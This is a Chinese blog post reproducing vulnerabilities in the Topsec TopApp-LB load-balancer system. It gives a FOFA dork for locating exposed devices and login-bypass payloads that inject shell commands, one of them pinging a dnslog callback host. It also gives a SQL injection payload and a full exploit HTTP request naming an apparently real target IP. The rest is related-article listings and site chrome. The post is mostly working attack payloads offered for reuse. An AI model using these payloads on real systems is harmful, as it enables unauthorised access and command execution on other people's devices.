天融信TopApp-LB 负载均衡系统

最新推荐文章于 2023-06-28 06:00:00 发布
最新推荐文章于 2023-06-28 06:00:00 发布
阅读量2.1k 收藏
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44508748/article/details/109897941
版权 
fofa:"TopApp-LB"

在这里插入图片描述

1.任意用户登录

①用户名随意 密码:;id(天融信负载均衡TopApp-LB系统无需密码直接登录)
②用户名: ; ping 9928e5.dnslog.info; echo 密码:随意
在这里插入图片描述
登录成功
在这里插入图片描述

2.sql注入漏洞

注入点vid

t=l&e=0&s=t&l=1&vid=1'--+&gid=0&lmt=10&o=r_Speed&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=@..

在这里插入图片描述
在这里插入图片描述

POST /acc/clsf/report/datasource.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 132
Origin: http://218.249.111.77:8888
Connection: close
Referer: http://218.249.111.77:8888/acc/clsf/report/datasource.php
Cookie: PHPSESSID=q5ra6lik94u92fprhbl4nplq26
Upgrade-Insecure-Requests: 1

t=l&e=0&s=t&l=1&vid=1&gid=0&lmt=10&o=r_Speed&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=%40%26%2312290%3B

在这里插入图片描述

Min1996
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
天融信负载均衡配置手册
04-25
天融信负载均衡配置手册
天融信TopApp NLB链路负载配置指导文档v2.doc
11-13
天融信 TopApp负载均衡系统的配置指导文档,从初始化开始详细指导了配置过程,建议大家下载使用。天融信负载均衡系统(以下简称TopApp产品)为客户提供高可靠的数据中心解决方案,包括链路负载均衡解决方案、服务器负载均衡解决方案、全局负载均衡解决方案。系统集成了压缩、缓存、SSL卸载等网络优化技术,加速业务系统提升系统效率。同时结合Web应用防火墙、DNS防火墙、DDoS攻击防护及漏洞扫描功能形成全方位的网络安全防护,为客户业务系统安全保驾护航。
2021Kfzz1#wiki#天融信负载均衡TopApp-LB任意登陆1
07-25
天融信负载均衡TopApp-LB任意登陆漏洞描述天融信负载均衡TopApp-LB系统无需密码可直接登陆,查看敏感信息影响版本天融信负载均衡TopApp-LB漏洞
天融信防火墙配置指南
12-07
天融信防火墙配置指南天融信防火墙配置指南
天融信安全隔离与信息交换系统-安装使用手册V3(Web界面).doc
08-04
首先,感谢使用天融信安全隔离与信息交换系统天融信安全隔离与信息交换系统是由天融信自主研发的、具有自主知识版权的隔离设备。该系统对网络通信进行完整采集、深层解析、应用重建,在网络间采用专用非TCP/IP进行数据交换,同时,本系统对网络通信的主体、客体进行综合的认证,确保通信安全可靠,从而实现在保证内外网络相互隔离的基础上进行适度的、可靠的数据交换。此外,天融信安全隔离与信息交换系统能够集成传统安全技术,进一步增强系统的防护能力。 通过使用天融信安全隔离与信息交换系统,用户可建立一套完整的、具有高精访问控制能力的、可防范各种安全风险的安全防护措施,确保用户信息系统安全、可靠地运行。
天融信负载均衡TopApp-LB命令执行
众生度尽,方证菩提
06-27 216
时光静悄悄地流逝。世界上有些人因为忙而感到生活的沉重,而有些人因为闲而活得压抑。
web访问负载均衡的实现
weixin_34320724的博客
11-08 119
主要的目的是实现负载均衡,所以采用rpm包安装,DNS也是提供最基本的正向解析。 环境介绍:三台虚拟机,数据库服务器以及DNS服务器放在172.16.16.3台虚拟机上,在172.16.16.33这台虚拟机上创建论坛,172.16.16.1这台虚拟机用来挂载第二台虚拟机上的论坛。 环境图示: 注意:确认selinux的状态时关闭的。 在虚拟机172....
天融信TOPApp-LB负载均衡-2020HW
战神/calmness的博客
09-25 1875
目录 描述 概述 影响 漏洞利用过程 前台绕过 注入 修复建议 天融信TOPApp-LB负载均衡SQL注入 描述 天融信负载均衡 TopAPP-LB产品旧版本在管理面存在SQL注入漏洞,具体为在可以访问管理服务情况 下,攻击者通过构造恶意请求,利用系统检查输入条件不严格的缺陷,进一步可获取部分系统本地信息。 概述 天融信负载均衡系统(以下简称TopApp产品)是一款融合了智能带宽控制功能的链路及服务器负载均衡产品。通过对网络出口链路和服务器资源的优化调度,TopApp-LB负载均
天融信TopApp-LB 负载均衡系统漏洞总结
qq_17754023的博客
08-11 758
1、天融信负载均衡TopApp-LB系统无需密码直接登陆。3、天融信TopApp-LB 负载均衡系统Sql注入漏洞。app=“天融信-TopApp-LB-负载均衡系统”2、天融信TopApp-LB负载均衡命令执行漏洞。title=“TopApp-LB 负载均衡系统”1、使用poc::用户名随意 密码:;...
天融信网闸web界面登录方式_一探究竟——天融信网闸TopRules7000
weixin_39815600的博客
11-27 4316
网闸即:安全隔离与信息交换系统,常用作企业内外网隔离与业务互访用途。相比给服务器加多块网卡跨多个网段来说,网闸提供了更加安全的方式。TR-71289-Q探究背景:某次,网闸配置新业务,重启设备查看是否生效,结果发现刚重启完设备后,软件还可以发现设备登录系统,一旦应用策略就会提示"Access violation at address 004DF29C in module 'GAP.exe'.错误"...
天融信初始账户密码 .xlsx
11-17
天融信产品存在各个设备初始账户密码均不同的情况,此表收集一些常用的账户密码仅供参考
负载均衡NLB快速配置手册
01-03
负载均衡NLB快速配置手册
天融信负载均衡TopApp-LB任意登陆
众生度尽,方证菩提
06-28 296
青年,青年!无论受怎样的挫折和打击,都要咬着牙关挺住,因为你们完全有机会重建生活;只要不灰心丧气,每一次挫折就只不过是通往新境界的一块普通绊脚石,而绝不会置人于死命。
ensp 移动主机搜索不到AP信道_有颜值更有才华,乘风破浪的天融信面板AP接受硬核实测...
weixin_39552472的博客
10-27 453
前言近日,信息化观察网选择天融信面板AP——TAP-62200(H)进行评测,希望评测数据能够帮助企业用户解决无线组网问题,营造快捷高效的办公环境。外观介绍TAP-62200(H)面板 AP 实拍图(正面)TAP-62200(H)面板 AP的机身为白色,外观采用八角工业设计,体积小巧,简约时尚,堪称无线AP产品中的颜值派。设备正面配有指示灯,可以通过不同的颜色显示设备不同的工作状态。TAP-622...
天融信网闸web界面登录方式_大华录像机网络回放有哪几种方式
weixin_39641738的博客
11-24 3460
录像机网络回放我们分为三种方式,下面给大家依次介绍下。方法一 WEB访问方式WEB访问前先确保主机与电脑之间网络连通,可以利用ping ***.***.***.***(硬盘录像机IP)来检测。如果ping通了,会有ping地址的返回信息,如下图:1、打开网页浏览器,地址栏输入要登录的硬盘录像机的IP地址,在登陆界面输入设备用户与密码登陆。注意:通过在地址栏输入要登录的硬盘录像机的IP地址登入设备的...
Apache Spark 未授权访问漏洞
weixin_44508748的博客
12-14 3533
Apache Spark是一款集群计算系统,其支持用户向管理节点提交应用,并分发给集群执行。如果管理节点未启动ACL(访问控制),我们将可以在集群中执行任意代码。 本次复现使用docker+vulhub一键搭建: docker-compose up -d 环境启动后,会自动启用四个端口:8080,8081,6066,7077 他们分别为: master的管理页面:http://your-ip:8080 slave的管理页面:http://your-ip:8081 standalone模式下,maste
宝塔服务器面板漏洞
weixin_44508748的博客
11-21 2337
宝塔服务器面板漏洞,phpmyadmin没加鉴权 IP:888(宝塔服务端口)/pma可直接登陆数据库。漏洞版本为7.4.2 http://1.x.x.x:888/ http://1.x.x.x:888/pma/
天融信运维安全审计系统-用户手册v3.0
最新发布
07-02
### 回答1: 天融信运维安全审计系统用户手册是为了帮助用户更好地使用该系统而编写的指导文档。该系统是一款针对企业网络安全进行审计和管理的工具。 用户手册v3.0提供了详细的系统安装和配置步骤,以及系统的基本功能和操作指南。通过阅读用户手册,用户可以了解系统的基本原理、技术要求以及必要的前提条件。同时,用户手册还包括了对系统各个模块的详细介绍,如日志审计、网络流量监测、事件告警等。 在用户手册中,还提供了一些常见问题的解答和故障排除指南,用户遇到问题时可以快速找到解决方法,提高系统的稳定性和可靠性。 除了基本功能的介绍,用户手册还提供了一些高级功能的使用指南,如安全策略配置、权限管理、报表定制等。用户可以根据自身需求,灵活地配置和管理系统。 用户手册还包括了一些最佳实践和安全建议,帮助用户提高企业网络安全的水平。用户可以通过按照用户手册中的步骤和建议,优化系统配置,提升网络安全性。 综上所述,天融信运维安全审计系统用户手册v3.0是一份非常重要的文档,它提供了对系统的全面介绍和详细操作指南,帮助用户更好地使用该系统,提高企业网络安全水平。 ### 回答2: 天融信运维安全审计系统-用户手册v3.0是一份面向用户的指导手册,用于帮助用户了解和正确使用该系统。该手册分为多个章节,依次介绍系统的安装、配置、功能及常见问题解答等内容。 在手册中,首先介绍了系统的概述和功能特点,以及系统所需的硬件和软件环境要求。用户可根据手册指导进行系统的安装,包括准备安装介质、运行安装程序、设置安装选项等。 接下来,手册详细介绍了系统的配置步骤,包括网络配置、存储配置、数据库配置等。用户可根据手册说明,按照实际情况进行相关配置操作。 随后,手册详细介绍了系统的各项功能,如日志审计、安全事件分析、入侵检测等。用户可以通过阅读手册,了解系统功能的操作步骤和功能特点,有效提升系统的运维能力。 此外,手册还提供了系统的常见问题解答,解答了一些用户在使用过程中可能遇到的问题和疑难情况。用户可通过查询手册,快速解决问题,提高系统的稳定性和安全性。 总之,天融信运维安全审计系统-用户手册v3.0是一个详细的指导手册,帮助用户全面了解和正确使用该系统。通过阅读手册,用户可以迅速上手,运维系统,提升安全性和稳定性。 ### 回答3: 天融信运维安全审计系统-用户手册v3.0 是一份详细的使用指南,用于指导用户在使用该系统时的操作和功能了解。用户手册包含系统概述、安装、配置、操作和故障排除等多个方面的内容。 首先,用户手册中给出了天融信运维安全审计系统的概述,介绍了该系统的设计目标和主要功能,帮助用户了解系统的作用和优势。 接着,用户手册详细说明了安装过程,包括硬件要求、操作系统要求以及安装步骤。用户可以根据手册中提供的指导完成系统的安装。 配置章节则介绍了系统的配置流程,包括网络设置、数据存储设置、日志设置等。通过按照用户手册中的步骤进行配置,用户可以使系统根据自身需求进行优化设置。 操作章节解释了系统的常用功能和操作方法,包括登录、查看审计日志、生成报表等。用户可以根据手册中的操作指引,轻松地完成各项操作,提高审计工作效率。 此外,用户手册还包括了故障排除章节,针对可能出现的常见问题和故障,给出了相应的解决方法,帮助用户避免和解决使用过程中的问题。 总之,天融信运维安全审计系统-用户手册v3.0 是一份全面且易于理解的使用指南,通过阅读手册,用户可以全面了解系统的各项功能和操作方法,能够顺利使用该系统,并且能够解决可能出现的故障。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值